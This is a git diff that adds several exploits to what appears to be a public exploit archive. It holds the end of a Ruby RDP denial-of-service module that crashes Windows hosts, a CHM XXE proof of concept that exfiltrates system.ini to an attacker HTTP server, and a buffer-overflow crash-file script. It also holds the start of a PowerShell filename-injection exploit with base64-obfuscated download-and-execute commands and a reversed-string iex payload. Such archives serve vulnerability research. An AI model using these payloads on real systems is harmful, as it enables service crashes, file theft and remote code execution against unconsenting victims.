+  def pdu_channel_request(user1, channel_id)
+    pdu = "\x38" + [user1, channel_id].pack("nn")                              # T.125 ChannelJoinRequest
+
+    return(rdp_build_data_tpdu(pdu))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
+  ## TS_INFO_PACKET - 2.2.1.11.1.1
+  def pdu_client_info(user_name, domain_name = "", ip_address = "")
+    ## Max. len for 4.0/6.0 servers is 44 bytes including terminator.
+    ## Max. len for all other versions is 512 including terminator.
+    ## We're going to limit to 44 (21 chars + null -> unicode) here.
+    
+    ## Blank username is valid, nil = random.
+    user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
+    user_unicode = Rex::Text.to_unicode(user_name[0..20],  type = 'utf-16le')
+    uname_len = user_unicode.length
+
+    ## Domain can can be, and for rdesktop typically is, empty.
+    ## Max. len for 4.0/5.0 servers is 52 including terminator.
+    ## Max. len for all other versions is 512 including terminator.
+    ## We're going to limit to 52 (25 chars + null -> unicode) here.
+    domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le')
+    domain_len = domain_unicode.length
+
+    ## This address value is primarily used to reduce the fields by which this
+    ## module can be fingerprinted. It doesn't show up in Windows logs.
+    ## clientAddress + null terminator
+    ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00"
+    ip_len = ip_unicode.length
+    
+    pdu = "\xa1\xa5\x09\x04" +
+    "\x09\x04\xbb\x47" +                                                       # CodePage
+    "\x03\x00\x00\x00" +                                                       # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
+    [domain_len].pack("S<") +                                                  # cbDomain (length value) - EXCLUDES null terminator
+    [uname_len].pack("S<") +                                                   # cbUserName (length value) - EXCLUDES null terminator
+    "\x00\x00" +                                                               # cbPassword (length value)
+    "\x00\x00" +                                                               # cbAlternateShell (length value)
+    "\x00\x00" +                                                               # cbWorkingDir (length value)
+    [domain_unicode].pack("a*") +                                              # Domain
+    "\x00\x00" +                                                               # Domain null terminator, EXCLUDED from value of cbDomain
+    [user_unicode].pack("a*") +                                                # UserName
+    "\x00\x00" +                                                               # UserName null terminator, EXCLUDED FROM value of cbUserName
+    "\x00\x00" +                                                               # Password - empty
+    "\x00\x00" +                                                               # AlternateShell - empty
+
+    ## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
+    "\x02\x00" +                                                               # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
+    [ip_len].pack("S<") +                                                      # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
+    [ip_unicode].pack("a*") +                                                  # clientAddress (unicode + null terminator (unicode)
+
+    "\x3c\x00" +                                                               # cbClientDir (length value): 60
+    "\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" +       # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
+    "\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" +
+    "\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" +
+    "\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" +
+    
+    ## clientTimeZone - TS_TIME_ZONE struct - 172 bytes
+    ## These are the default values for rdesktop
+    "\xa4\x01\x00\x00" +                                                       # Bias
+
+    ## StandardName - 'GTB,normaltid'
+    "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
+    "\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" +
+    "\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" +       # StandardDate
+    "\x00\x00\x00\x00" +                                                       # StandardBias
+
+    ## DaylightName - 'GTB,sommartid'
+    "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
+    "\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" +
+    "\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" +       # DaylightDate
+    "\xc4\xff\xff\xff" +                                                       # DaylightBias
+
+    "\x01\x00\x00\x00" +                                                       # clientSessionId
+    "\x06\x00\x00\x00" +                                                       # performanceFlags
+    "\x00\x00" +                                                               # cbAutoReconnectCookie
+    "\x64\x00\x00\x00"
+
+    return(pdu)
+  end
+
+  # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
+  # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
+  def pdu_client_confirm_active()
+    pdu  = "\xea\x03\x01\x00" +                                                # shareId: 66538
+    "\xea\x03" +                                                               # originatorId
+    "\x06\x00" +                                                               # lengthSourceDescriptor: 6
+    "\x3e\x02" +                                                               # lengthCombinedCapabilities: ???
+    "\x4d\x53\x54\x53\x43\x00" +                                               # SourceDescriptor: 'MSTSC'
+    "\x17\x00" +                                                               # numberCapabilities: 23
+    "\x00\x00" +                                                               # pad2Octets
+    "\x01\x00" +                                                               # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
+    "\x18\x00" +                                                               # lengthCapability: 24
+    "\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00" +
+    "\x02\x00" +                                                               # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
+    "\x1c\x00" +                                                               # lengthCapability: 28
+    "\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" +
+    "\x01\x00\x00\x1a\x01\x00\x00\x00" +
+    "\x03\x00" +                                                               # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
+    "\x58\x00" +                                                               # lengthCapability: 88
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" +
+    "\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" +
+    "\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" +
+    "\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" +
+    "\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" +
+    "\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x0a\x00" +                                                               # capabilitySetType: 10 - ??
+    "\x08\x00" +                                                               # lengthCapability: 8
+    "\x06\x00\x00\x00" +
+    "\x07\x00" +                                                               # capabilitySetType: 7  - TSWINDOWACTIVATION_CAPABILITYSET
+    "\x0c\x00" +                                                               # lengthCapability: 12
+    "\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x05\x00" +                                                               # capabilitySetType: 5  - TS_CONTROL_CAPABILITYSET
+    "\x0c\x00" +                                                               # lengthCapability: 12
+    "\x00\x00\x00\x00\x02\x00\x02\x00" +
+    "\x08\x00" +                                                               # capabilitySetType: 8  - TS_POINTER_CAPABILITYSET
+    "\x0a\x00" +                                                               # lengthCapability: 10
+    "\x01\x00\x14\x00\x15\x00" +
+    "\x09\x00" +                                                               # capabilitySetType: 9  - TS_SHARE_CAPABILITYSET
+    "\x08\x00" +                                                               # lengthCapability: 8
+    "\x00\x00\x00\x00" +
+    "\x0d\x00" +                                                               # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
+    "\x58\x00" +                                                               # lengthCapability: 88
+    "\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" +
+    "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+    "\x00\x00\x00\x00" +
+    "\x0c\x00" +                                                               # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
+    "\x08\x00" +                                                               # lengthCapability: 8
+    "\x01\x00\x00\x00" +
+    "\x0e\x00" +                                                               # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
+    "\x08\x00" +                                                               # lengthCapability: 8
+    "\x01\x00\x00\x00" +
+    "\x10\x00" +                                                               # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET
+    "\x34\x00" +                                                               # lengthCapability: 52
+    "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" +
+    "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" +
+    "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" +
+    "\x0f\x00" +                                                               # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
+    "\x08\x00" +                                                               # lengthCapability: 8
+    "\x01\x00\x00\x00" +
+    "\x11\x00" +                                                               # capabilitySetType: ??
+    "\x0c\x00" +                                                               # lengthCapability: 12
+    "\x01\x00\x00\x00\x00\x28\x64\x00" +
+    "\x14\x00" +                                                               # capabilitySetType: ??
+    "\x0c\x00" +                                                               # lengthCapability: 12
+    "\x01\x00\x00\x00\x00\x00\x00\x00" +
+    "\x15\x00" +                                                               # capabilitySetType: ??
+    "\x0c\x00" +                                                               # lengthCapability: 12
+    "\x02\x00\x00\x00\x00\x0a\x00\x01" +
+    "\x1a\x00" +                                                               # capabilitySetType: ??
+    "\x08\x00" +                                                               # lengthCapability: 8
+    "\xaf\x94\x00\x00" +
+    "\x1c\x00" +                                                               # capabilitySetType: ??
+    "\x0c\x00" +                                                               # lengthCapability: 12
+    "\x12\x00\x00\x00\x00\x00\x00\x00" +
+    "\x1b\x00" +                                                               # capabilitySetType: ??
+    "\x06\x00" +                                                               # lengthCapability: 6
+    "\x01\x00" +
+    "\x1e\x00" +                                                               # capabilitySetType: ??
+    "\x08\x00" +                                                               # lengthCapability: 8
+    "\x01\x00\x00\x00" +
+    "\x18\x00" +                                                               # capabilitySetType: ??
+    "\x0b\x00" +                                                               # lengthCapability: 11
+    "\x02\x00\x00\x00\x03\x0c\x00" +
+    "\x1d\x00" +                                                               # capabilitySetType: ??
+    "\x5f\x00" +                                                               # lengthCapability: 95
+    "\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" +
+    "\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" +
+    "\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" +
+    "\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" +
+    "\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" +
+    "\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
+
+    ## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
+    return(rdp_build_share_control_header(0x13, pdu))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
+  ## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 /  2.2.14.1
+  def pdu_client_synchronize(target_user = 0)    
+    pdu = "\x01\x00" +                                                         # messageType: 1 SYNCMSGTYPE_SYNC
+    [target_user].pack("S<")                                                   # targetUser, 16 bit, unsigned.
+
+    ## pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE
+    data_header = rdp_build_share_data_header(0x1f, pdu)
+
+    ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+    return(rdp_build_share_control_header(0x17, data_header))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
+  ## Control Cooperate - TC_CONTROL_PDU 2.2.1.15
+  def pdu_client_control_cooperate()
+    pdu = "\x04\x00" +                                                         # action: 4 - CTRLACTION_COOPERATE
+    "\x00\x00" +                                                               # grantId: 0
+    "\x00\x00\x00\x00"                                                         # controlId: 0
+
+    ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
+    data_header = rdp_build_share_data_header(0x14, pdu)
+
+    ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+    return(rdp_build_share_control_header(0x17, data_header))
+  end
+
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
+  ## Control Request - TC_CONTROL_PDU 2.2.1.16
+  def pdu_client_control_request()
+
+    pdu = "\x01\x00" +                                                         # action: 1 - CTRLACTION_REQUEST_CONTROL
+    "\x00\x00" +                                                               # grantId: 0
+    "\x00\x00\x00\x00"                                                         # controlId: 0
+
+    ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
+    data_header = rdp_build_share_data_header(0x14, pdu)
+
+    ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+    return(rdp_build_share_control_header(0x17, data_header))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
+  ## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
+  def pdu_client_input_event_sychronize()
+    pdu = "\x01\x00" +                                                         # numEvents: 1
+    "\x00\x00" +                                                               # pad2Octets
+    "\x00\x00\x00\x00" +                                                       # eventTime
+    "\x00\x00" +                                                               # messageType: 0 - INPUT_EVENT_SYNC
+  
+    ## TS_SYNC_EVENT 202.8.1.1.3.1.1.5
+    "\x00\x00" +                                                               # pad2Octets
+    "\x00\x00\x00\x00"                                                         # toggleFlags
+
+    ## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
+    data_header = rdp_build_share_data_header(0x1c, pdu)
+
+    ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+    return(rdp_build_share_control_header(0x17, data_header))
+  end
+
+  ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
+  ## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
+  def pdu_client_font_list()
+    pdu = "\x00\x00" +                                                         # numberFonts: 0
+    "\x00\x00" +                                                               # totalNumberFonts: 0
+    "\x03\x00" +                                                               # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
+    "\x32\x00"                                                                 # entrySize: 50
+
+    ## pduType2 = 0x27 = 29 - PDUTYPE2_FONTLIST
+    data_header = rdp_build_share_data_header(0x27, pdu)
+
+    ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+    return(rdp_build_share_control_header(0x17, data_header))
+  end
+
+  # ------------------------------------------------------------------------- #
+
+  def crash_test(rc4enckey, hmackey)
+    begin
+      received = ""
+      for i in 0..5
+        received += rdp_recv()
+      end
+    rescue RdpCommunicationError
+      # we don't care
+    end
+
+    vprint_status("Sending DoS payload")
+    found = false
+    for j in 0..15
+      ## x86_payload:
+      rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
+
+      ## x64_payload:
+      rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
+    end
+  end
+
+  def produce_dos()
+  
+    unless(rdp_connection_initiation())
+      vprint_status("Could not connect to RDP.")
+      return(false)
+    end
+    
+    vprint_status("Sending initial client data")
+    received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME']))
+
+    rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received)
+
+    vprint_status("Sending erect domain request")
+    rdp_send(pdu_erect_domain_request())
+
+    vprint_status("Sending attach user request")
+    received = rdp_sendrecv(pdu_attach_user_request())
+
+    user1 = received[9, 2].unpack("n").first
+
+    [1003, 1004, 1005, 1006, 1007].each do | chan |
+      rdp_sendrecv(pdu_channel_request(user1, chan))
+    end
+
+    ## 5.3.4 Client Random Value
+    client_rand = ''
+    32.times { client_rand << rand(0..255) }
+    rcran = bytes_to_bignum(client_rand)
+
+    vprint_status("Sending security exchange PDU")
+    rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))
+
+    ## We aren't decrypting anything at this point. Leave the variables here
+    ## to make it easier to understand in the future.
+    rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)
+
+    vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}")
+    vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}")
+    vprint_status("HMAC_KEY:    #{bin_to_hex(hmackey)}")
+    vprint_status("SESS_BLOB:   #{bin_to_hex(sessblob)}")
+
+    rc4enckey = RC4.new(rc4encstart)
+
+    vprint_status("Sending client info PDU") # TODO
+    pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP'])
+    received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true))
+
+    vprint_status("Received License packet")
+    rdp_recv()
+
+    vprint_status("Sending client confirm active PDU")
+    rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey))
+
+    vprint_status("Sending client synchronize PDU")
+    rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey))
+
+    vprint_status("Sending client control cooperate PDU")
+    rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey))
+
+    vprint_status("Sending client control request control PDU")
+    rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey))
+
+    vprint_status("Sending client input sychronize PDU")
+    rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey))
+
+    vprint_status("Sending client font list PDU")
+    rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey))
+
+    vprint_status("Sending close mst120 PDU")
+    crash_test(rc4enckey, hmackey)
+
+    vprint_status("Sending client disconnection PDU")
+    rdp_send(rdp_build_data_tpdu("\x21\x80"))
+
+    return(true)
+  end
+
+  # ------------------------------------------------------------------------- #
+
+  def run_host(ip)
+    ## Allow the run command to call the check command.
+    begin
+      if(open_connection())
+        status = produce_dos()
+      end
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
+      bt = e.backtrace.join("\n")
+      vprint_error("Unexpected error: #{e.message}")
+      vprint_line(bt)
+      elog("#{e.message}\n#{bt}")
+    rescue RdpCommunicationError => e
+      vprint_error("Error communicating RDP protocol.")
+      status = Exploit::CheckCode::Unknown
+    rescue Errno::ECONNRESET => e                                              # NLA?
+      vprint_error("Connection reset, possible NLA is enabled.")
+    rescue => e
+      bt = e.backtrace.join("\n")
+      vprint_error("Unexpected error: #{e.message}")
+      vprint_line(bt)
+      elog("#{e.message}\n#{bt}")
+    ensure
+
+      if(status == true)
+        sleep(1)
+        unless(open_connection())
+          print_good("The host is crashed!")
+        else
+          print_bad("The DoS has been sent but the host is already connected!")
+        end
+      end
+
+      disconnect()
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/windows/dos/47127.txt b/exploits/windows/dos/47127.txt
new file mode 100644
index 000000000..6052d2865
--- /dev/null
+++ b/exploits/windows/dos/47127.txt
@@ -0,0 +1,105 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: ApparitionSec          
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Compiled HTML Help "hh.exe"
+
+Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools.
+The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
+CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
+
+
+[Vulnerability Type]
+Uncompiled .CHM File XML External Entity Injection
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by
+simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
+Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.
+
+Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
+having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. 
+
+While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to
+create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.
+
+Note: User interaction is required to exploit this vulnerability.
+
+
+[Exploit/POC]
+1) python -m SimpleHTTPServer
+
+
+2) "XXE.chm.chm"
+
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
+<HTML>
+<HEAD>
+<Title>Uncompiled CHM File XXE PoC</Title>
+</HEAD>
+<BODY>
+<xml>
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE tastyexploits [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+</xml>
+</BODY>
+</HTML>
+
+
+3) "payload.dtd"  (hosted in python web-server dir port 81 above)
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
+%all;
+
+
+Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.
+
+Tested successfully Windows 7/10
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=iaxp1iBDWXY
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: April 25, 2019
+MSRC Response: "We determined that this behavior is considered to be by design"
+July 16, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/dos/47131.py b/exploits/windows/dos/47131.py
new file mode 100755
index 000000000..f289ac258
--- /dev/null
+++ b/exploits/windows/dos/47131.py
@@ -0,0 +1,26 @@
+# Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service
+# Date: 2019-07-16
+# Vendor Homepage:http://www.winmpg.com
+# Software Link:  https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file=
+# Exploit Author: stresser
+# Tested Version: 3.0
+# Tested on: Windows XP SP3 EN
+
+
+# 1.- Run python code :WinMPG.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open WinMPG and Click 'Register'
+# 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code'
+# 5.- Click 'Ok'and you will see a crash.
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47248.py b/exploits/windows/dos/47248.py
new file mode 100755
index 000000000..3ffe4e220
--- /dev/null
+++ b/exploits/windows/dos/47248.py
@@ -0,0 +1,417 @@
+'''
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
+[+] ISR: Apparition Security          
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows PowerShell
+
+Windows PowerShell is a Windows command-line shell designed especially for system administrators.
+PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.
+
+
+[Vulnerability Type]
+Unsanitized Filename Command Execution
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
+This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
+or the running of unexpected commands straight from the filename itself without the need for a second file.
+
+For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
+Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
+Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.
+
+However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.
+
+Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger 
+the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
+as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.
+
+My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
+Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
+abbreviated for space then it sleeps for 2 seconds and finally executes.
+
+C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
+
+This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
+We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
+commands can be stored.
+
+For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.
+
+First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
+c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
+
+Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.
+
+Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
+
+Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
+The "-e" is abbreviated for EncodedCommand to again save filename space.
+
+Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
+Double click to open in PowerShell watch the file get downloaded saved and executed!
+
+My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.
+
+Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!
+
+
+[Exploit / PoC]
+'''
+
+from base64 import b64encode
+from base64 import b64decode
+from socket import *
+import argparse,sys,socket,struct,re
+
+#GGPowerShell
+#Microsoft Windows PowerShell - Unsantized Filename RCE Dirty File Creat0r.
+#
+#Original advisory:
+#http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
+#
+#Original PoC:
+#https://www.youtube.com/watch?v=AH33RW9g8J4
+#
+#By John Page (aka hyp3rlinx)
+#Apparition Security
+#=========================
+#Features added to the original advisory script:
+#
+#Original script may have issues with -O for save files with certain PS versions, so now uses -OutFile.
+#
+#Added: server port option (Base64 mode only)
+#
+#Added: -z Reverse String Command as an alternative to default Base64 encoding obfuscation.
+#Example self reversing payload to save and execute a file "n.js" from 127.0.0.1 port 80 is only 66 bytes.
+#
+#$a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a
+#
